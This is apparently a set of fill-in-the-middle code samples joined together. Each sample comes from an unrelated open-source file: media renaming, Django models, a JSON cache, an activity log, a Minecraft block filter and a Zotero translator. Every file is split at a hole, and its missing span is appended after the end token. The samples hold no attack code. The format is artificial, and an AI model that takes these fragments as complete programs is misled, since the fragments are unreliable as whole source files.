sickbeard.NAMING_ANIME if not self.show.is_anime: anime_type = 3 result = self.formatted_filename(anime_type=anime_type) # if they want us to flatten it and we're allowed to flatten it then we will if self.show.flatten_folders and not sickbeard.NAMING_FORCE_FOLDERS: return result # if not we append the folder on and use that else: result = ek.ek(os.path.join, self.formatted_dir(), result) return result def formatted_dir(self, pattern=None, multi=None): """ Just the folder name of the episode """ if pattern == None: # we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps: pattern = sickbeard.NAMING_ABD_PATTERN elif self.show.sports and sickbeard.NAMING_CUSTOM_SPORTS and not self.relatedEps: pattern = sickbeard.NAMING_SPORTS_PATTERN elif self.show.anime and sickbeard.NAMING_CUSTOM_ANIME: pattern = sickbeard.NAMING_ANIME_PATTERN else: pattern = sickbeard.NAMING_PATTERN # split off the dirs only, if they exist name_groups = re.split(r'[\\/]', pattern) if len(name_groups) == 1: return '' else: return self._format_pattern(os.sep.join(name_groups[:-1]), multi) def formatted_filename(self, pattern=None, multi=None, anime_type=None): """ Just the filename of the episode, formatted based on the naming settings """ if pattern == None: # we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps: pattern = sickbeard.NAMING_ABD_PATTERN elif self.show.sports and sickbeard.NAMING_CUSTOM_SPORTS and not self.relatedEps: pattern = sickbeard.NAMING_SPORTS_PATTERN elif self.show.anime and sickbeard.NAMING_CUSTOM_ANIME: pattern = sickbeard.NAMING_ANIME_PATTERN else: pattern = sickbeard.NAMING_PATTERN # split off the dirs only, if they exist name_groups = re.split(r'[\\/]', pattern) return helpers.sanitizeFileName(self._format_pattern(name_groups[-1], multi, anime_type)) def rename(self): """ Renames an episode file and all related files to the location and filename as specified in the naming settings. """ if not ek.ek(os.path.isfile, self.location): logger.log(u"Can't perform rename on " + self.location + " when it doesn't exist, skipping", logger.WARNING) return proper_path = self.proper_path() absolute_proper_path = ek.ek(os.path.join, self.show.location, proper_path) absolute_current_path_no_ext, file_ext = ek.ek(os.path.splitext, self.location) absolute_current_path_no_ext_length = len(absolute_current_path_no_ext) related_subs = [] current_path = absolute_current_path_no_ext if absolute_current_path_no_ext.startswith(self.show.location): current_path = absolute_current_path_no_ext[len(self.show.location):] logger.log(u"Renaming/moving episode from the base path " + self.location + " to " + absolute_proper_path, logger.DEBUG) # if it's already named correctly then don't do anything if proper_path == current_path: logger.log(str(self.indexerid) + u": File " + self.location + " is already named correctly, skipping", logger.DEBUG) return related_files = postProcessor.PostProcessor(self.location).list_associated_files( self.location, base_name_only=True, subfolders=True) #This is wrong. Cause of pp not moving subs. if self.show.subtitles and sickbeard.SUBTITLES_DIR != '': related_subs = postProcessor.PostProcessor(self.location).list_associated_files(sickbeard.SUBTITLES_DIR, subtitles_only=True, subfolders=True) absolute_proper_subs_path = ek.ek(os.path.join, sickbeard.SUBTITLES_DIR, self.formatted_filename()) logger.log(u"Files associated to " + self.location + ": " + str(related_files), logger.DEBUG) # move the ep file result = helpers.rename_ep_file(self.location, absolute_proper_path, absolute_current_path_no_ext_length) # move related files for cur_related_file in related_files: #We need to fix something here because related files can be in subfolders and the original code doesn't handle this (at all) cur_related_dir = ek.ek(os.path.dirname, ek.ek(os.path.abspath, cur_related_file)) subfolder = cur_related_dir.replace(ek.ek(os.path.dirname, ek.ek(os.path.abspath, self.location)), '') #We now have a subfolder. We need to add that to the absolute_proper_path. #First get the absolute proper-path dir proper_related_dir = ek.ek(os.path.dirname, ek.ek(os.path.abspath, absolute_proper_path + file_ext)) proper_related_path = absolute_proper_path.replace(proper_related_dir, proper_related_dir + subfolder) cur_result = helpers.rename_ep_file(cur_related_file, proper_related_path, absolute_current_path_no_ext_length + len(subfolder)) if not cur_result: logger.log(str(self.indexerid) + u": Unable to rename file " + cur_related_file, logger.ERROR) for cur_related_sub in related_subs: absolute_proper_subs_path = ek.ek(os.path.join, sickbeard.SUBTITLES_DIR, self.formatted_filename()) cur_result = helpers.rename_ep_file(cur_related_sub, absolute_proper_subs_path, absolute_current_path_no_ext_length) if not cur_result: logger.log(str(self.indexerid) + u": Unable to rename file " + cur_related_sub, logger.ERROR) # save the ep with self.lock: if result: self.location = absolute_proper_path + file_ext for relEp in self.relatedEps: relEp.location = absolute_proper_path + file_ext # in case something changed with the metadata just do a quick check for curEp in [self] + self.relatedEps: curEp.checkForMetaFiles() # save any changes to the databas sql_l = [] with self.lock: for relEp in [self] + self.relatedEps: sql_l.append(relEp.get_sql()) if len(sql_l) > 0: myDB = db.DBConnection() myDB.mass_action(sql_l) def airdateModifyStamp(self): """ Make the modify date and time of a file reflect the show air date and time. Note: Also called from postProcessor """ hr = min = 0 airs = re.search('.*?(\d{1,2})(?::\s*?(\d{2}))?\s*(pm)?', self.show.airs, re.I) if airs: hr = int(airs.group(1)) hr = (12 + hr, hr)[None is airs.group(3)] hr = (hr, hr - 12)[0 == hr % 12 and 0 != hr] min = int((airs.group(2), min)[None is airs.group(2)]) airtime = datetime.time(hr, min) if sickbeard.TIMEZONE_DISPLAY == 'local': airdatetime = sbdatetime.sbdatetime.convert_to_setting( network_timezones.parse_date_time(datetime.date.toordinal(self.airdate), self.show.airs, self.show.network)) else: airdatetime = datetime.datetime.combine(self.airdate, airtime).replace(tzinfo=tzlocal()) filemtime = datetime.datetime.fromtimestamp(os.path.getmtime(self.location)).replace(tzinfo=tzlocal()) if filemtime != airdatetime: import time airdatetime = airdatetime.timetuple() logger.log(str(self.show.indexerid) + u": About to modify date of '" + self.location + "' to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime), logger.DEBUG) try: if helpers.touchFile(self.location, time.mktime(airdatetime)): logger.log(str(self.show.indexerid) + u": Changed modify date of " + os.path.basename(self.location) + " to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime)) else: logger.log(str(self.show.indexerid) + u": Unable to modify date of " + os.path.basename(self.location) + " to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime), logger.ERROR) except: logger.log(str(self.show.indexerid) + u": Failed to modify date of '" + os.path.basename(self.location) + "' to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime), logger.ERROR) def __getstate__(self): d = dict(self.__dict__) del d['lock'] return d def __setstate__(self, d): d['lock'] = threading.Lock() self.__dict__.update(d)<|fim▁end|>
ep_string += other_ep._format_string(ep_format.upper(), other_ep._replace_map()) if anime_type != 3:
<|file_name|>0002_comment.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('blogg', '0001_initial'), ]<|fim▁hole|> migrations.CreateModel( name='Comment', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('content', models.TextField(max_length=1000L)), ('author', models.CharField(default=b'Anonymous', max_length=100, blank=True)), ('ip_address', models.GenericIPAddressField(null=True, blank=True)), ('user_agent', models.CharField(max_length=500L, blank=True)), ('published', models.BooleanField(default=True)), ('created', models.DateTimeField(auto_now_add=True)), ('modified', models.DateTimeField(auto_now=True, auto_now_add=True)), ('post', models.ForeignKey(related_name='comments', to='blogg.Post')), ], options={ 'ordering': ['-created'], }, bases=(models.Model,), ), ]<|fim▁end|>
operations = [
<|file_name|>ContentDbDict.py<|end_file_name|><|fim▁begin|>import time import os import ContentDb from Debug import Debug from Config import config class ContentDbDict(dict): def __init__(self, site, *args, **kwargs): s = time.time() self.site = site self.cached_keys = [] self.log = self.site.log self.db = ContentDb.getContentDb() self.db_id = self.db.needSite(site) self.num_loaded = 0 super(ContentDbDict, self).__init__(self.db.loadDbDict(site)) # Load keys from database self.log.debug("ContentDb init: %.3fs, found files: %s, sites: %s" % (time.time() - s, len(self), len(self.db.site_ids))) def loadItem(self, key): try: self.num_loaded += 1 if self.num_loaded % 100 == 0: if config.verbose: self.log.debug("Loaded json: %s (latest: %s) called by: %s" % (self.num_loaded, key, Debug.formatStack())) else: self.log.debug("Loaded json: %s (latest: %s)" % (self.num_loaded, key)) content = self.site.storage.loadJson(key) dict.__setitem__(self, key, content) except IOError: if dict.get(self, key): self.__delitem__(key) # File not exists anymore raise KeyError(key) self.addCachedKey(key) self.checkLimit() return content def getItemSize(self, key): return self.site.storage.getSize(key) # Only keep last 10 accessed json in memory def checkLimit(self): if len(self.cached_keys) > 10: key_deleted = self.cached_keys.pop(0) dict.__setitem__(self, key_deleted, False) def addCachedKey(self, key): if key not in self.cached_keys and key != "content.json" and len(key) > 40: # Always keep keys smaller than 40 char self.cached_keys.append(key) def __getitem__(self, key): val = dict.get(self, key) if val: # Already loaded return val elif val is None: # Unknown key raise KeyError(key) elif val is False: # Loaded before, but purged from cache return self.loadItem(key) def __setitem__(self, key, val):<|fim▁hole|> self.db.setContent(self.site, key, val, size) dict.__setitem__(self, key, val) def __delitem__(self, key): self.db.deleteContent(self.site, key) dict.__delitem__(self, key) try: self.cached_keys.remove(key) except ValueError: pass def iteritems(self): for key in dict.keys(self): try: val = self[key] except Exception as err: self.log.warning("Error loading %s: %s" % (key, err)) continue yield key, val def items(self): back = [] for key in dict.keys(self): try: val = self[key] except Exception as err: self.log.warning("Error loading %s: %s" % (key, err)) continue back.append((key, val)) return back def values(self): back = [] for key, val in dict.iteritems(self): if not val: try: val = self.loadItem(key) except Exception: continue back.append(val) return back def get(self, key, default=None): try: return self.__getitem__(key) except KeyError: return default except Exception as err: self.site.bad_files[key] = self.site.bad_files.get(key, 1) dict.__delitem__(self, key) self.log.warning("Error loading %s: %s" % (key, err)) return default def execute(self, query, params={}): params["site_id"] = self.db_id return self.db.execute(query, params) if __name__ == "__main__": import psutil process = psutil.Process(os.getpid()) s_mem = process.memory_info()[0] / float(2 ** 20) root = "data-live/1MaiL5gfBM1cyb4a8e3iiL8L5gXmoAJu27" contents = ContentDbDict("1MaiL5gfBM1cyb4a8e3iiL8L5gXmoAJu27", root) print "Init len", len(contents) s = time.time() for dir_name in os.listdir(root + "/data/users/")[0:8000]: contents["data/users/%s/content.json" % dir_name] print "Load: %.3fs" % (time.time() - s) s = time.time() found = 0 for key, val in contents.iteritems(): found += 1 assert key assert val print "Found:", found print "Iteritem: %.3fs" % (time.time() - s) s = time.time() found = 0 for key in contents.keys(): found += 1 assert key in contents print "In: %.3fs" % (time.time() - s) print "Len:", len(contents.values()), len(contents.keys()) print "Mem: +", process.memory_info()[0] / float(2 ** 20) - s_mem<|fim▁end|>
self.addCachedKey(key) self.checkLimit() size = self.getItemSize(key)
<|file_name|>_private.py<|end_file_name|><|fim▁begin|>from optparse import make_option from django.core.management.base import BaseCommand, CommandError from django.core.validators import URLValidator from django.core.exceptions import ValidationError class ADBaseCommand(BaseCommand): option_list = BaseCommand.option_list + ( make_option('--overwrite', action='store_true', dest='overwrite', default=False, help='Overwrite existed images'), ) url_validator = URLValidator() <|fim▁hole|> try: self.url_validator(url) return True except ValidationError, e: return False def handle(self, *args, **options): if options.get('overwrite'): self.stdout.write('==== Overwrite mode enabled, all of images will be re-download ===\n')<|fim▁end|>
def valid_url(self, url):
<|file_name|>variant-size-differences.rs<|end_file_name|><|fim▁begin|>#![deny(variant_size_differences)] <|fim▁hole|> V0(u8), VBig([u8; 1024]), //~ ERROR variant is more than three times larger } fn main() {}<|fim▁end|>
enum _En {
<|file_name|>log.py<|end_file_name|><|fim▁begin|># The absolute import feature is required so that we get the root celery # module rather than `amo.celery`. from __future__ import absolute_import from inspect import isclass from celery.datastructures import AttributeDict from tower import ugettext_lazy as _ __all__ = ('LOG', 'LOG_BY_ID', 'LOG_KEEP',) class _LOG(object): action_class = None class CREATE_ADDON(_LOG): id = 1 action_class = 'add' format = _(u'{addon} was created.') keep = True class EDIT_PROPERTIES(_LOG): """ Expects: addon """ id = 2 action_class = 'edit' format = _(u'{addon} properties edited.') class EDIT_DESCRIPTIONS(_LOG): id = 3 action_class = 'edit' format = _(u'{addon} description edited.') class EDIT_CATEGORIES(_LOG): id = 4 action_class = 'edit' format = _(u'Categories edited for {addon}.') class ADD_USER_WITH_ROLE(_LOG): id = 5 action_class = 'add' format = _(u'{0.name} ({1}) added to {addon}.') keep = True class REMOVE_USER_WITH_ROLE(_LOG): id = 6 action_class = 'delete' # L10n: {0} is the user being removed, {1} is their role. format = _(u'{0.name} ({1}) removed from {addon}.') keep = True class EDIT_CONTRIBUTIONS(_LOG): id = 7 action_class = 'edit' format = _(u'Contributions for {addon}.') class USER_DISABLE(_LOG): id = 8 format = _(u'{addon} disabled.') keep = True class USER_ENABLE(_LOG): id = 9 format = _(u'{addon} enabled.') keep = True # TODO(davedash): Log these types when pages are present class SET_PUBLIC_STATS(_LOG): id = 10 format = _(u'Stats set public for {addon}.') keep = True # TODO(davedash): Log these types when pages are present class UNSET_PUBLIC_STATS(_LOG): id = 11 format = _(u'{addon} stats set to private.') keep = True class CHANGE_STATUS(_LOG): id = 12 # L10n: {0} is the status format = _(u'{addon} status changed to {0}.') keep = True class ADD_PREVIEW(_LOG): id = 13 action_class = 'add' format = _(u'Preview added to {addon}.') class EDIT_PREVIEW(_LOG): id = 14 action_class = 'edit' format = _(u'Preview edited for {addon}.') class DELETE_PREVIEW(_LOG): id = 15 action_class = 'delete' format = _(u'Preview deleted from {addon}.') class ADD_VERSION(_LOG): id = 16 action_class = 'add' format = _(u'{version} added to {addon}.') keep = True class EDIT_VERSION(_LOG): id = 17 action_class = 'edit' format = _(u'{version} edited for {addon}.') class DELETE_VERSION(_LOG): id = 18 action_class = 'delete' # Note, {0} is a string not a version since the version is deleted. # L10n: {0} is the version number format = _(u'Version {0} deleted from {addon}.') keep = True class ADD_FILE_TO_VERSION(_LOG): id = 19 action_class = 'add' format = _(u'File {0.name} added to {version} of {addon}.') class DELETE_FILE_FROM_VERSION(_LOG): """ Expecting: addon, filename, version Because the file is being deleted, filename and version should be strings and not the object. """ id = 20 action_class = 'delete' format = _(u'File {0} deleted from {version} of {addon}.') class APPROVE_VERSION(_LOG): id = 21 action_class = 'approve' format = _(u'{addon} {version} approved.') short = _(u'Approved') keep = True review_email_user = True review_queue = True class PRELIMINARY_VERSION(_LOG): id = 42 action_class = 'approve' format = _(u'{addon} {version} given preliminary review.') short = _(u'Preliminarily approved') keep = True review_email_user = True review_queue = True class REJECT_VERSION(_LOG): # takes add-on, version, reviewtype id = 43 action_class = 'reject' format = _(u'{addon} {version} rejected.') short = _(u'Rejected') keep = True review_email_user = True review_queue = True class RETAIN_VERSION(_LOG): # takes add-on, version, reviewtype id = 22 format = _(u'{addon} {version} retained.') short = _(u'Retained') keep = True review_email_user = True review_queue = True class ESCALATE_VERSION(_LOG): # takes add-on, version, reviewtype id = 23 format = _(u'{addon} {version} escalated.') short = _(u'Escalated') keep = True review_email_user = True review_queue = True class REQUEST_VERSION(_LOG): # takes add-on, version, reviewtype id = 24 format = _(u'{addon} {version} review requested.') short = _(u'Review requested') keep = True review_email_user = True review_queue = True class REQUEST_INFORMATION(_LOG): id = 44 format = _(u'{addon} {version} more information requested.') short = _(u'More information requested') keep = True review_email_user = True review_queue = True class REQUEST_SUPER_REVIEW(_LOG): id = 45 format = _(u'{addon} {version} super review requested.') short = _(u'Super review requested') keep = True review_queue = True class COMMENT_VERSION(_LOG): id = 49 format = _(u'Comment on {addon} {version}.') short = _(u'Comment') keep = True review_queue = True hide_developer = True class ADD_TAG(_LOG): id = 25 action_class = 'tag' format = _(u'{tag} added to {addon}.') class REMOVE_TAG(_LOG): id = 26 action_class = 'tag' format = _(u'{tag} removed from {addon}.') class ADD_TO_COLLECTION(_LOG): id = 27 action_class = 'collection' format = _(u'{addon} added to {collection}.') class REMOVE_FROM_COLLECTION(_LOG): id = 28 action_class = 'collection' format = _(u'{addon} removed from {collection}.') class ADD_REVIEW(_LOG): id = 29 action_class = 'review' format = _(u'{review} for {addon} written.') # TODO(davedash): Add these when we do the admin site class ADD_RECOMMENDED_CATEGORY(_LOG): id = 31 action_class = 'edit' # L10n: {0} is a category name. format = _(u'{addon} featured in {0}.') class REMOVE_RECOMMENDED_CATEGORY(_LOG):<|fim▁hole|> # L10n: {0} is a category name. format = _(u'{addon} no longer featured in {0}.') class ADD_RECOMMENDED(_LOG): id = 33 format = _(u'{addon} is now featured.') keep = True class REMOVE_RECOMMENDED(_LOG): id = 34 format = _(u'{addon} is no longer featured.') keep = True class ADD_APPVERSION(_LOG): id = 35 action_class = 'add' # L10n: {0} is the application, {1} is the version of the app format = _(u'{0} {1} added.') class CHANGE_USER_WITH_ROLE(_LOG): """ Expects: author.user, role, addon """ id = 36 # L10n: {0} is a user, {1} is their role format = _(u'{0.name} role changed to {1} for {addon}.') keep = True class CHANGE_LICENSE(_LOG): """ Expects: license, addon """ id = 37 action_class = 'edit' format = _(u'{addon} is now licensed under {0.name}.') class CHANGE_POLICY(_LOG): id = 38 action_class = 'edit' format = _(u'{addon} policy changed.') class CHANGE_ICON(_LOG): id = 39 action_class = 'edit' format = _(u'{addon} icon changed.') class APPROVE_REVIEW(_LOG): id = 40 action_class = 'approve' format = _(u'{review} for {addon} approved.') editor_format = _(u'{user} approved {review} for {addon}.') keep = True editor_event = True class DELETE_REVIEW(_LOG): """Requires review.id and add-on objects.""" id = 41 action_class = 'review' format = _(u'Review {review} for {addon} deleted.') editor_format = _(u'{user} deleted {review} for {addon}.') keep = True editor_event = True class MAX_APPVERSION_UPDATED(_LOG): id = 46 format = _(u'Application max version for {version} updated.') class BULK_VALIDATION_EMAILED(_LOG): id = 47 format = _(u'Authors emailed about compatibility of {version}.') class BULK_VALIDATION_USER_EMAILED(_LOG): id = 130 format = _(u'Email sent to Author about add-on compatibility.') class CHANGE_PASSWORD(_LOG): id = 48 format = _(u'Password changed.') class PAYPAL_FAILED(_LOG): id = 51 format = _(u'{addon} failed checks with PayPal.') class MANIFEST_UPDATED(_LOG): id = 52 format = _(u'{addon} manifest updated.') class APPROVE_VERSION_WAITING(_LOG): id = 53 action_class = 'approve' format = _(u'{addon} {version} approved but waiting to be made public.') short = _(u'Approved but waiting') keep = True review_email_user = True review_queue = True class PURCHASE_ADDON(_LOG): id = 54 format = _(u'{addon} purchased.') class INSTALL_ADDON(_LOG): id = 55 format = _(u'{addon} installed.') class USER_EDITED(_LOG): id = 60 format = _(u'Account updated.') class ESCALATION_CLEARED(_LOG): id = 66 format = _(u'Escalation cleared for {addon}.') short = _(u'Escalation cleared') keep = True review_queue = True class APP_DISABLED(_LOG): id = 67 format = _(u'{addon} disabled.') short = _(u'App disabled') keep = True review_queue = True class ESCALATED_HIGH_ABUSE(_LOG): id = 68 format = _(u'{addon} escalated because of high number of abuse reports.') short = _(u'High Abuse Reports') keep = True review_queue = True class ESCALATE_MANUAL(_LOG): id = 73 format = _(u'{addon} escalated by reviewer.') short = _(u'Reviewer escalation') keep = True review_queue = True # TODO(robhudson): Escalation log for editor escalation.. class VIDEO_ERROR(_LOG): id = 74 format = _(u'Video removed from {addon} because of a problem with ' u'the video. ') short = _(u'Video removed') class REREVIEW_DEVICES_ADDED(_LOG): id = 75 format = _(u'{addon} re-review because of new device(s) added.') short = _(u'Device(s) Added') keep = True review_queue = True class REVIEW_DEVICE_OVERRIDE(_LOG): id = 76 format = _(u'{addon} device support manually changed by reviewer.') short = _(u'Device(s) Changed by Reviewer') keep = True review_queue = True class CUSTOM_TEXT(_LOG): id = 98 format = '{0}' class CUSTOM_HTML(_LOG): id = 99 format = '{0}' class OBJECT_ADDED(_LOG): id = 100 format = _(u'Created: {0}.') admin_event = True class OBJECT_EDITED(_LOG): id = 101 format = _(u'Edited field: {2} set to: {0}.') admin_event = True class OBJECT_DELETED(_LOG): id = 102 format = _(u'Deleted: {1}.') admin_event = True class ADMIN_USER_EDITED(_LOG): id = 103 format = _(u'User {user} edited, reason: {1}') admin_event = True class ADMIN_USER_ANONYMIZED(_LOG): id = 104 format = _(u'User {user} anonymized.') admin_event = True class ADMIN_USER_RESTRICTED(_LOG): id = 105 format = _(u'User {user} restricted.') admin_event = True class ADMIN_VIEWED_LOG(_LOG): id = 106 format = _(u'Admin {0} viewed activity log for {user}.') admin_event = True class EDIT_REVIEW(_LOG): id = 107 action_class = 'review' format = _(u'{review} for {addon} updated.') class THEME_REVIEW(_LOG): id = 108 action_class = 'review' format = _(u'{addon} reviewed.') class GROUP_USER_ADDED(_LOG): id = 120 action_class = 'access' format = _(u'User {0.name} added to {group}.') keep = True admin_event = True class GROUP_USER_REMOVED(_LOG): id = 121 action_class = 'access' format = _(u'User {0.name} removed from {group}.') keep = True admin_event = True class REVIEW_FEATURES_OVERRIDE(_LOG): id = 122 format = _(u'{addon} minimum requirements manually changed by reviewer.') short = _(u'Requirements Changed by Reviewer') keep = True review_queue = True class REREVIEW_FEATURES_CHANGED(_LOG): id = 123 format = _(u'{addon} minimum requirements manually changed.') short = _(u'Requirements Changed') keep = True review_queue = True class CHANGE_VERSION_STATUS(_LOG): id = 124 # L10n: {0} is the status format = _(u'{version} status changed to {0}.') keep = True class DELETE_USER_LOOKUP(_LOG): id = 125 # L10n: {0} is the status format = _(u'User {0.name} {0.id} deleted via lookup tool.') keep = True class CONTENT_RATING_TO_ADULT(_LOG): id = 126 format = _('{addon} content rating changed to Adult.') review_queue = True class CONTENT_RATING_CHANGED(_LOG): id = 127 format = _('{addon} content rating changed.') class ADDON_UNLISTED(_LOG): id = 128 format = _(u'{addon} unlisted.') keep = True class BETA_SIGNED_VALIDATION_PASSED(_LOG): id = 131 format = _(u'{file} was signed.') keep = True class BETA_SIGNED_VALIDATION_FAILED(_LOG): id = 132 format = _(u'{file} was signed.') keep = True class DELETE_ADDON(_LOG): id = 133 action_class = 'delete' # L10n: {0} is the add-on GUID. format = _(u'Addon id {0} with GUID {1} has been deleted') keep = True LOGS = [x for x in vars().values() if isclass(x) and issubclass(x, _LOG) and x != _LOG] # Make sure there's no duplicate IDs. assert len(LOGS) == len(set(log.id for log in LOGS)) LOG_BY_ID = dict((l.id, l) for l in LOGS) LOG = AttributeDict((l.__name__, l) for l in LOGS) LOG_ADMINS = [l.id for l in LOGS if hasattr(l, 'admin_event')] LOG_KEEP = [l.id for l in LOGS if hasattr(l, 'keep')] LOG_EDITORS = [l.id for l in LOGS if hasattr(l, 'editor_event')] LOG_REVIEW_QUEUE = [l.id for l in LOGS if hasattr(l, 'review_queue')] # Is the user emailed the message? LOG_REVIEW_EMAIL_USER = [l.id for l in LOGS if hasattr(l, 'review_email_user')] # Logs *not* to show to the developer. LOG_HIDE_DEVELOPER = [l.id for l in LOGS if (getattr(l, 'hide_developer', False) or l.id in LOG_ADMINS)] def log(action, *args, **kw): """ e.g. amo.log(amo.LOG.CREATE_ADDON, []), amo.log(amo.LOG.ADD_FILE_TO_VERSION, file, version) """ from access.models import Group from addons.models import Addon from amo import get_user, logger_log from devhub.models import (ActivityLog, AddonLog, CommentLog, GroupLog, UserLog, VersionLog) from users.models import UserProfile from versions.models import Version user = kw.get('user', get_user()) if not user: logger_log.warning('Activity log called with no user: %s' % action.id) return al = ActivityLog(user=user, action=action.id) al.arguments = args if 'details' in kw: al.details = kw['details'] al.save() if 'details' in kw and 'comments' in al.details: CommentLog(comments=al.details['comments'], activity_log=al).save() # TODO(davedash): post-remora this may not be necessary. if 'created' in kw: al.created = kw['created'] # Double save necessary since django resets the created date on save. al.save() for arg in args: if isinstance(arg, tuple): if arg[0] == Addon: AddonLog(addon_id=arg[1], activity_log=al).save() elif arg[0] == Version: VersionLog(version_id=arg[1], activity_log=al).save() elif arg[0] == UserProfile: UserLog(user_id=arg[1], activity_log=al).save() elif arg[0] == Group: GroupLog(group_id=arg[1], activity_log=al).save() elif isinstance(arg, Addon): AddonLog(addon=arg, activity_log=al).save() elif isinstance(arg, Version): VersionLog(version=arg, activity_log=al).save() elif isinstance(arg, UserProfile): # Index by any user who is mentioned as an argument. UserLog(activity_log=al, user=arg).save() elif isinstance(arg, Group): GroupLog(group=arg, activity_log=al).save() # Index by every user UserLog(activity_log=al, user=user).save() return al<|fim▁end|>
id = 32 action_class = 'edit'
<|file_name|>BlockFilter.java<|end_file_name|><|fim▁begin|>package org.saga.shape; import org.bukkit.Material; import org.bukkit.block.Block; import java.util.HashSet; public class BlockFilter implements ShapeFilter { /** * Materials. */ private HashSet<Material> materials = new HashSet<>(); /** * If true then the check will return the reverse result. */ private boolean flip = false; // Initialisation: /** * Initialises. * */ public BlockFilter() { } /** * Adds a material. * * @param material * material */ public void addMaterial(Material material) { materials.add(material); } /** * Flips the check result. * */ public void flip() { flip = true; } // Filtering: /* * (non-Javadoc) * * @see org.saga.shape.ShapeFilter#checkBlock(org.bukkit.block.Block) */ @Override public boolean checkBlock(Block block) { if (flip) return !materials.contains(block.getType());<|fim▁hole|> } }<|fim▁end|>
return materials.contains(block.getType());
<|file_name|>WHO.js<|end_file_name|><|fim▁begin|>{ "translatorID": "cd587058-6125-4b33-a876-8c6aae48b5e8", "label": "WHO", "creator": "Mario Trojan, Philipp Zumstein", "target": "^http://apps\\.who\\.int/iris/", "minVersion": "3.0", "maxVersion": "", "priority": 100, "inRepository": true, "translatorType": 4, "browserSupport": "gcsibv", "lastUpdated": "2018-09-02 14:34:27" } /* ***** BEGIN LICENSE BLOCK ***** Copyright © 2018 Mario Trojan This file is part of Zotero. Zotero is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Zotero is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with Zotero. If not, see <http://www.gnu.org/licenses/>. ***** END LICENSE BLOCK ***** */ // attr()/text() v2 function attr(docOrElem,selector,attr,index){var elem=index?docOrElem.querySelectorAll(selector).item(index):docOrElem.querySelector(selector);return elem?elem.getAttribute(attr):null;} function text(docOrElem,selector,index){var elem=index?docOrElem.querySelectorAll(selector).item(index):docOrElem.querySelector(selector);return elem?elem.textContent:null;} function detectWeb(doc, url) { if (url.includes("/handle/") && text(doc, 'div.item-summary-view-metadata')) { var type = attr(doc, 'meta[name="DC.type"]', 'content'); //Z.debug(type); if (type && type.includes("articles")) { return "journalArticle"; } if (type && (type.includes("Book") || type.includes("Publications"))) { return "book"; } return "report"; } else if (getSearchResults(doc, true)) { return "multiple"; } } function getSearchResults(doc, checkOnly) { var items = {}; var found = false; var rows = doc.querySelectorAll('h4.artifact-title>a'); for (let i=0; i<rows.length; i++) { let href = rows[i].href; var title = rows[i].textContent; if (!href || !title) continue; if (checkOnly) return true; found = true; items[href] = title; } return found ? items : false; } function doWeb(doc, url) { if (detectWeb(doc, url) == "multiple") { Zotero.selectItems(getSearchResults(doc, false), function (items) { if (!items) { return true; } var articles = []; for (var i in items) { articles.push(i); } ZU.processDocuments(articles, scrape); }); } else { scrape(doc, url); } } function scrape(doc, url) { // copy meta tags in body to head var head = doc.getElementsByTagName('head'); var metasInBody = ZU.xpath(doc, '//body/meta'); for (let meta of metasInBody) { head[0].append(meta); } var type = detectWeb(doc, url); var translator = Zotero.loadTranslator('web'); // Embedded Metadata translator.setTranslator('951c027d-74ac-47d4-a107-9c3069ab7b48'); translator.setHandler('itemDone', function (obj, item) { if (item.publisher && !item.place && item.publisher.includes(' : ')) { let placePublisher = item.publisher.split(' : '); item.place = placePublisher[0]; item.publisher = placePublisher[1]; } var firstAuthor = attr(doc, 'meta[name="DC.creator"]', 'content'); if (firstAuthor && !firstAuthor.includes(',')) { item.creators[0] = { "lastName": firstAuthor, "creatorType": "author", "fieldMode": true }; } var descriptions = doc.querySelectorAll('meta[name="DC.description"]'); // DC.description doesn't actually contain other useful content, // except possibly the number of pages for (let description of descriptions) { var numPages = description.content.match(/(([lxiv]+,\s*)?\d+)\s*p/); if (numPages) { if (ZU.fieldIsValidForType("numPages", item.itemType)) { item.numPages = numPages[1]; } else if (!item.extra) { item.extra = "number-of-pages: " + numPages[1]; } else { item.extra += "\nnumber-of-pages: " + numPages[1]; } delete item.abstractNote; } } item.complete(); }); translator.getTranslatorObject(function(trans) { trans.itemType = type; trans.doWeb(doc, url); }); } /** BEGIN TEST CASES **/ var testCases = [ { "type": "web", "url": "http://apps.who.int/iris/handle/10665/70863?locale=ar", "items": [ { "itemType": "report", "title": "Consensus document on the epidemiology of severe acute respiratory syndrome (SARS)", "creators": [ { "lastName": "World Health Organization", "creatorType": "author", "fieldMode": true } ], "date": "2003", "extra": "number-of-pages: 46", "institution": "World Health Organization", "language": "en", "libraryCatalog": "apps.who.int", "place": "Geneva", "reportNumber": "WHO/CDS/CSR/GAR/2003.11", "url": "http://apps.who.int/iris/handle/10665/70863", "attachments": [ { "title": "Full Text PDF", "mimeType": "application/pdf" }, { "title": "Snapshot" } ], "tags": [ { "tag": "Communicable Diseases and their Control" }, { "tag": "Disease outbreaks" }, { "tag": "Epidemiologic surveillance" }, { "tag": "Severe acute respiratory syndrome" } ], "notes": [], "seeAlso": [] } ] }, { "type": "web", "url": "http://apps.who.int/iris/handle/10665/272081", "items": [ { "itemType": "journalArticle", "title": "Providing oxygen to children in hospitals: a realist review", "creators": [ { "firstName": "Hamish", "lastName": "Graham", "creatorType": "author" }, { "firstName": "Shidan", "lastName": "Tosif", "creatorType": "author" }, { "firstName": "Amy", "lastName": "Gray", "creatorType": "author" }, { "firstName": "Shamim", "lastName": "Qazi", "creatorType": "author" }, { "firstName": "Harry", "lastName": "Campbell", "creatorType": "author" }, { "firstName": "David", "lastName": "Peel", "creatorType": "author" }, {<|fim▁hole|> "firstName": "Barbara", "lastName": "McPake", "creatorType": "author" }, { "firstName": "Trevor", 